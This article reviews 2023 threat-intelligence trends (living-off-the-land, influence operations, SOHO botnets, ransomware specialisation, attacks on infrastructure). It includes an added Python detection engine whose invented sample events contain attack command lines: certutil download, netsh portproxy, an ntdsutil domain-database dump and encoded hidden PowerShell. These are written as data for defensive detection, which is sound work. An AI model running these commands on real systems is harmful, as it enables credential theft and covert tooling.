What will cyber threats look like in 2024?

2023 was a big year for threat intelligence. The sheer volume of threats and attacks revealed through Microsoft’s analysis of 78 trillion daily security signals indicates a shift in how threat actors are scaling and leveraging nation-state support. We saw more attacks than ever before, with attack chains growing increasingly complex; dwell times becoming shorter; and tactics, techniques, and procedures (TTPs) evolving to become nimbler and more evasive.

By looking back at the details of key security incidents in 2023, we can begin to isolate patterns and identify lessons for how we should respond to new threats. Informed by TTP trends across the globe in 2023, here are some of the highlights you should be aware of and monitor in 2024.

  1. Achieving stealth by avoiding custom tools and malware: One of the core trends identified in 2023 is that threat actors are beginning to selectively avoid the use of custom malware. Instead, they may attempt to slip under the radar and go undetected by using tools and processes that already exist on their victim’s devices. This allows adversaries to obscure themselves alongside other threat actors using similar methods to launch attacks.

An example of this trend can be seen with Volt Typhoon, a Chinese state-sponsored actor that made headlines for targeting US critical infrastructure with living-off-the-land techniques.
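Because living-off-the-land activity uses binaries that are already present and legitimately used on the host, detection has to key on how a built-in tool is invoked and by what parent, not on the tool's presence. The following is an added example written for this page, not Microsoft's detection logic and not derived from any tracked actor's tooling: a small rule engine run over constructed process-creation events (field names mirror what an EDR or Sysmon process-create record carries, but the events, host names and rule thresholds are all invented for illustration).

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry). Each record
# carries the parent image, the image launched, and the full command line.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\notes.txt"},
    {"host": "ws01", "parent": "winword.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"host": "srv02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "srv02", "parent": "cmd.exe", "image": "netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 "
                "connectaddress=10.0.0.5 connectport=3389"},
    {"host": "dc01", "parent": "cmd.exe", "image": "ntdsutil.exe",
     "cmdline": 'ntdsutil "ac i ntds" ifm "create full C:\\temp" q q'},
    {"host": "ws03", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"host": "ws03", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil -verify cert.cer"},   # benign use of the same binary
]

# Illustrative rules (hypothetical, not a vendor ruleset): a built-in binary
# whose benign use is common, paired with an argument pattern that is rarely
# seen in routine administration. image=None means "match any image".
LOLBIN_RULES = [
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache|-decode", re.I)),
    ("netsh_portproxy", "netsh.exe", re.compile(r"\bportproxy\b.*\badd\b", re.I)),
    ("ntdsutil_ifm_dump", "ntdsutil.exe", re.compile(r"\bifm\b", re.I)),
    ("powershell_encoded", None, re.compile(r"powershell.*(-enc\b|-encodedcommand)", re.I)),
]

# Parent/child pairing rule: document-handling applications have no business
# launching an interpreter, whatever the command line looks like.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass(frozen=True)
class Alert:
    host: str
    rule: str
    cmdline: str


def evaluate(event):
    """Return every alert a single process-creation event triggers."""
    alerts = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    for name, img, pattern in LOLBIN_RULES:
        if (img is None or img == image) and pattern.search(cmd):
            alerts.append(Alert(event["host"], name, cmd))
    if parent in OFFICE_APPS and image in SHELLS:
        alerts.append(Alert(event["host"], "office_spawns_shell", cmd))
    return alerts


def scan(events):
    """Run all rules over a batch of events; order follows the input."""
    return [alert for event in events for alert in evaluate(event)]


def summarize(events):
    """Alert count per host, the first pivot an analyst usually makes."""
    counts = {}
    for alert in scan(events):
        counts[alert.host] = counts.get(alert.host, 0) + 1
    return counts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert.host:6} {alert.rule:24} {alert.cmdline}")
    print(summarize(SAMPLE_EVENTS))
```

Note that the two certutil events on ws03 differ only in their arguments: the rule fires on the download-style invocation and stays silent on the certificate check, which is the whole point of argument-aware rules for dual-use binaries. The second event on ws01 trips two independent rules (an encoded PowerShell command line and an Office parent spawning a shell), and stacking such signals is what keeps the alert useful when any single built-in tool looks ordinary on its own.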

  2. Combining cyber and influence operations for greater impact: Last summer, Microsoft observed certain nation-state actors combining cyber operations and influence operations (IO) methods into a new hybrid known as “cyber-enabled influence operations.” Threat actors commonly use cyber-enabled influence operations to boost, exaggerate, or compensate for shortcomings in their network access or cyberattack capabilities.

For example, Microsoft has observed multiple Iranian actors attempting to use bulk SMS messaging to enhance the amplification and psychological effects of their cyber-influence operations. We’re also seeing more cyber-enabled influence operations attempt to impersonate purported victim organizations, or leading figures in those organizations, to add credibility to the effects of the cyberattack or compromise.

  3. Creating covert networks by targeting small office/home office network edge devices: Another key trend is the abuse of small office/home office (SOHO) network edge devices. Threat actors are assembling covert networks from these devices, such as the router in your local dentist’s office or your favorite coffee shop. Some adversaries will even use programs to assist with locating vulnerable endpoints around the world to identify the jumping-off point for their next attack. This technique complicates attribution, making attacks appear to originate from virtually anywhere.
  4. Leveraging social media operations to increase audience engagement: Covert influence operations have now begun to successfully engage with target audiences on social media to a greater extent than previously observed, representing higher levels of sophistication and cultivation of online IO assets.

For example, Microsoft and industry partners observed Chinese-affiliated social media accounts impersonating US voters ahead of the 2022 US midterm elections, posing as Americans across the political spectrum and responding to comments from authentic users.

  5. Prioritizing specialization within the ransomware economy: Ransomware operators in 2023 trended toward specialization, choosing to focus on a small range of capabilities and services. This specialization has a splintering effect, spreading components of a ransomware attack across multiple providers in a complex underground economy. No longer can companies just think of ransomware attacks as coming from an individual threat actor or group. Instead, they may be combatting the entire ransomware-as-a-service (RaaS) economy. In response, Microsoft Threat Intelligence now tracks ransomware providers individually, noting which groups traffic in initial access and which offer other services.
  6. Targeting infrastructure for maximum disruption: Finally, we’re seeing some threat actors target other outcomes beyond simple data acquisition. Instead, some are focusing on infrastructure organizations like water treatment facilities, maritime operations, transportation organizations, and more for their disruption value. This trend can be seen in Volt Typhoon’s attacks against critical infrastructure organizations in Guam and elsewhere in the United States.

Rather than leveraging these attacks to obtain valuable or sensitive data, we believe Volt Typhoon may be trying to develop capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.

As we move forward into 2024, it’s important to continually look back on the trends and significant breaches from years past. By analyzing these incidents and the threat actors behind them, we can better understand different adversaries’ personas and predict their next move. To learn more about the latest threat intelligence news and information, visit Microsoft Security Insider and check out The Microsoft Threat Intelligence Podcast.
